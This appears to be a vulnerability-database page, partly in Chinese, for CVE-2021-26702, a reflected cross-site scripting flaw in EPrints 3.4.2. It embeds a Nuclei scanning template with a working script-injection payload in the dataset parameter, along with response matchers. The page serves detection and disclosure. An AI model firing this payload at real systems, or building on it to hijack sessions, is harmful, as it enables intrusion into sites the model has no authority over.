CVE-2021-26702: EPrints 3.4.2 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: EPrints | POC: 已公开

漏洞描述

EPrints 3.4.2 contains a reflected cross-site scripting vulnerability in the dataset parameter to the cgi/dataset_ dictionary URI.

PoC代码[已公开]

id: CVE-2021-26702

info:
  name: EPrints 3.4.2 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: EPrints 3.4.2 contains a reflected cross-site scripting vulnerability in the dataset parameter to the cgi/dataset_ dictionary URI.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest security patches or upgrade to a newer version of EPrints that addresses this vulnerability.
  reference:
    - https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf
    - https://files.eprints.org/2548/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-26702
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/grymer/CVE
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-26702
    cwe-id: CWE-79
    epss-score: 0.05031
    epss-percentile: 0.89335
    cpe: cpe:2.3:a:eprints:eprints:3.4.2:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: eprints
    product: eprints
  tags: cve2021,cve,xss,eprints

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi/dataset_dictionary?dataset=zulu%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ff284a9b0200c01dce6ee0d31161bb81037aae2984aebf7e074404899c2e3ca602200e424244ba113339aea606f406edaa109e2f1a28c04018671b83d60a507336a3:922c64590222798bb761d5b6d8e72950

相关漏洞推荐